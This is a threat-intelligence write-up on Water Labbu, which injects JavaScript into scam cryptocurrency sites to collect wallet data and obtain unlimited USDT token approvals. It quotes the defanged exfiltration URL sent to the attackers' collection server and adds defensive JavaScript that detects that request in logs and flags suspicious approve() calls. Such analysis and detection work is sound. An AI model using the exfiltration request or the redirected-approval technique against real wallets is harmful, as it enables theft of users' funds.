March 29, 2024

How Water Labbu steals cryptocurrencies from scammers


Water Labbu profits from the social engineering schemes of other scammers by injecting malicious JavaScript code into decentralized applications (DApps) to steal cryptocurrency.

Researchers at Trend Micro found Water Labbu, malicious code that targets services built for cryptocurrency fraud. As a rule, crypto scammers use social engineering to gain the trust of the victim. Water Labbu steals cryptocurrency in a similar way but without using social engineering itself, at least not directly. Instead, Water Labbu lets other scammers do the work of tricking unsuspecting victims with their own social engineering.

When the attacker finds a victim whose wallet, connected to one of the fraudulent sites, holds a large amount of cryptocurrency, the injected JavaScript payload sends an approval request. The request is disguised as if it came from the compromised site and asks for permission (a token approval) to transfer an almost unlimited amount of USD Tether (USDT, a stablecoin pegged 1:1 to the US dollar) from the target's wallet.

Water Labbu's targets are led to believe that the request was originally issued by the DApp; however, the permission granted does not go to the original scammer's crypto addresses but to another address controlled by Water Labbu.

There are currently 45 known cryptocurrency-related scam DApp sites that were compromised by Water Labbu. These sites share styles and themes with the sites used in "no-loss" liquidity scams.

After checking the transaction records of the attackers' addresses on the Ethereum blockchain, it was found that they successfully stole funds from at least nine different victims, totaling at least $316,728.

Analysis of the cryptocurrency theft process

Water Labbu's method involves compromising rogue DApp websites and injecting JavaScript payloads into them.

Experts noticed the following behavior:

  • If the victim downloads the script from an Android or iOS mobile device, it injects the first-stage script, which has the ability to steal cryptocurrency.
  • If the victim downloads the script from a Windows desktop, it injects a different script that shows a fake Flash update message asking them to download a malicious executable.
  • It is worth noting that the delivery server implements a mechanism to avoid serving the script to the same IP address several times within a short period. If the IP address has accessed the delivery server in the last few hours, or the victim's device type does not meet the other prerequisites, it returns a simple script that collects cookie and LocalStorage data and sends it back to the delivery server.

Cryptocurrency theft script: first stage

The web3.js library is loaded first. This gives the script the ability to connect to the victim's wallet, although the malicious script only contacts the wallet if it is already connected to the compromised DApp site. Access to the wallet allows Water Labbu to identify the target's Ethereum address and balance. The script also interacts with the Tether USD smart contract to get the victim's USDT balance. If the wallet contains more than 0.001 ETH or more than 1 USDT, it sends the wallet balance information and wallet address to the collection server, linkstometa[.]com, via an HTTP request.

The text below shows a request that exfiltrates the wallet balance:

hxxps[:]//linkstometa[.]com/data/?get&s=[%22{ETH balance}%22,%22{USDT balance}%22]&j={Ethereum address}
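The exfiltration request above has a fixed shape that a defender can look for in outbound web-proxy logs. The following is an added example, not code from the original report or from Water Labbu: a small scanner that matches the request shape (a GET to linkstometa[.]com/data/ whose query is `?get&s=["<eth>","<usdt>"]&j=<wallet address>`) and extracts the reported balances and wallet address for triage. The log format and every log line in it are constructed for the example.

```javascript
// Added example, not code from the original report or from Water Labbu:
// scan constructed proxy log lines for the balance-exfiltration request shape
// quoted in the report and pull out the fields an analyst needs for triage.

const EXFIL_HOST = 'linkstometa.com'; // collection server named in the report (defanged there as linkstometa[.]com)

// Constructed log format: "<timestamp> <client-ip> <method> <url> <status>"
const SAMPLE_LOG = [
  '2024-03-29T10:14:58Z 10.0.0.12 GET https://example.com/app/index.html 200',
  '2024-03-29T10:15:02Z 10.0.0.12 GET https://linkstometa.com/data/?get&s=[%220.012%22,%2225000%22]&j=0xabababababababababababababababababababab 200',
  '2024-03-29T10:15:07Z 10.0.0.12 GET https://linkstometa.com/static/app.js 200',
  '2024-03-29T10:15:09Z 10.0.0.14 GET https://example.com/data/?get&s=[%221%22,%222%22]&j=notanaddress 200',
];

// Returns a finding object when the line matches the exfiltration pattern, else null.
function detectExfil(line) {
  const fields = line.trim().split(/\s+/);
  if (fields.length < 5) return null;
  const [ts, src, method, rawUrl] = fields;
  let url;
  try { url = new URL(rawUrl); } catch { return null; }
  if (method !== 'GET' || url.hostname !== EXFIL_HOST || !url.pathname.startsWith('/data/')) return null;

  // The report shows the quotes percent-encoded (%22); decode before matching.
  let query;
  try { query = decodeURIComponent(url.search); } catch { return null; }
  const hasGetFlag = /[?&]get(?:&|$)/.test(query);
  const balances = query.match(/[?&]s=\["([^"]*)","([^"]*)"\]/);
  const wallet = query.match(/[?&]j=(0x[0-9a-f]{40})(?:&|$)/i);
  if (!hasGetFlag || !balances || !wallet) return null;

  return {
    timestamp: ts,
    sourceIp: src,
    ethBalance: balances[1],
    usdtBalance: balances[2],
    wallet: wallet[1].toLowerCase(),
  };
}

// Scans a list of log lines and returns every exfiltration finding.
function scanLog(lines) {
  return lines.map(detectExfil).filter(Boolean);
}

console.log(scanLog(SAMPLE_LOG));
```

The match is deliberately strict on the query shape rather than on the hostname alone, so that the same logic keeps working if the collection domain changes but the script's request format does not; the extracted wallet address is what lets an analyst identify which user's wallet was profiled.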

Cryptocurrency theft script: second stage

The exfiltration request deploys the second-stage script as soon as the reported ETH balance is above 0.005 ETH and the USDT token balance is above 22,000 USDT. Otherwise, the server returns an empty payload and leaves the victim to the other scammers. In the second stage, another balance check is performed and a token approval is requested.


The token approval request asks the victim to grant a specified address permission to complete transactions and spend cryptocurrency assets. The malicious script requests an approval limit of 10^32 USDT, far in excess of the total amount of USDT in existence on the blockchain. When an "approve" request is issued, cryptocurrency wallet applications ask users to review the details of the request before confirming. If the victim does not carefully verify the request data and grants the approval to the Water Labbu address, the attacker is able to transfer all USDT out of the victim's wallet.
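The two warning signs in that approval, an absurdly large allowance and a spender that is not the DApp contract the user believes they are dealing with, can both be read directly from the calldata before the user confirms. The following is an added example, not code from the original report or from Water Labbu: a pre-confirmation check that decodes an ERC-20 `approve(address,uint256)` call and reports those findings. The token contract, the expected DApp spender, the attacker spender and both transactions are constructed fixtures; none of them are real addresses, and the 1M USDT "sane" limit is an assumption chosen for the example.

```javascript
// Added example, not code from the original report or from Water Labbu:
// decode an ERC-20 approve() call and flag an unlimited allowance or an
// unexpected spender before a wallet user confirms it.

const APPROVE_SELECTOR = '0x095ea7b3'; // first 4 bytes of keccak256("approve(address,uint256)")
const UINT256_MAX = (1n << 256n) - 1n;

// Decodes approve(spender, amount) calldata; returns null if it is not a well-formed approve call.
function decodeApprove(calldata) {
  const data = String(calldata).toLowerCase();
  // "0x" + 4-byte selector + two 32-byte ABI words = 138 hex characters
  if (!data.startsWith(APPROVE_SELECTOR) || data.length !== 138 || !/^0x[0-9a-f]+$/.test(data)) return null;
  const spenderWord = data.slice(10, 74);
  const amountWord = data.slice(74, 138);
  if (!/^0{24}/.test(spenderWord)) return null; // addresses are left-padded with 12 zero bytes
  return { spender: '0x' + spenderWord.slice(24), amount: BigInt('0x' + amountWord) };
}

// Assesses a transaction request {to, data} against what the user expects:
// expected = { tokenContract, dappSpender, decimals, maxSaneUnits } (constructed below).
function assessApproval(tx, expected) {
  const decoded = decodeApprove(tx.data);
  if (!decoded) return { isApprove: false, findings: [] };
  const findings = [];
  if (tx.to.toLowerCase() !== expected.tokenContract.toLowerCase()) {
    findings.push('approve is sent to an unexpected token contract');
  }
  if (decoded.spender !== expected.dappSpender.toLowerCase()) {
    findings.push(`spender ${decoded.spender} is not the DApp contract the user is interacting with`);
  }
  const units = decoded.amount / 10n ** expected.decimals; // whole tokens
  if (decoded.amount === UINT256_MAX) {
    findings.push('allowance is uint256 max (unlimited)');
  } else if (units > expected.maxSaneUnits) {
    findings.push(`allowance of ${units} whole tokens exceeds the sane limit of ${expected.maxSaneUnits}`);
  }
  return { isApprove: true, spender: decoded.spender, allowanceUnits: units, findings };
}

// ABI-encodes approve(spender, amount); used only to build the fixtures below.
function encodeApprove(spender, amount) {
  const addr = spender.toLowerCase().replace(/^0x/, '').padStart(64, '0');
  const amt = amount.toString(16).padStart(64, '0');
  return APPROVE_SELECTOR + addr + amt;
}

// Constructed fixtures: none of these are real contract or attacker addresses.
const EXPECTED = {
  tokenContract: '0x' + '11'.repeat(20), // stand-in for the USDT token contract
  dappSpender:   '0x' + '22'.repeat(20), // the DApp's own contract the user meant to approve
  decimals: 6n,                          // USDT uses 6 decimals
  maxSaneUnits: 1000000n,                // assumed limit: anything above 1M USDT is flagged
};
const ATTACKER_SPENDER = '0x' + '33'.repeat(20);

// Approval shaped like the one in the report: 10^32 granted to an address that is not the DApp
const SUSPICIOUS_TX = { to: EXPECTED.tokenContract, data: encodeApprove(ATTACKER_SPENDER, 10n ** 32n) };
// A benign approval of 100 USDT (100 * 10^6 base units) to the DApp's own contract
const BENIGN_TX = { to: EXPECTED.tokenContract, data: encodeApprove(EXPECTED.dappSpender, 100n * 10n ** 6n) };

console.log(assessApproval(SUSPICIOUS_TX, EXPECTED));
console.log(assessApproval(BENIGN_TX, EXPECTED));
```

The spender comparison is the check that catches this particular scheme: the allowance limit alone would also fire on legitimate DApps that ask for "unlimited" approvals, but an approval whose spender is neither the DApp's contract nor a known router is the signature of a redirected approval like Water Labbu's.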


Water Labbu managed to steal $316,728 worth of cryptocurrency by injecting its malicious scripts into the fraudulent websites of other scammers, demonstrating a willingness to piggyback on other attackers' methods for its own ends.

Users should therefore be wary of any investment invitation that comes from an unreliable party. In addition, they should not trade cryptocurrencies on an unknown platform without carefully checking its legitimacy and understanding what it does and how it works.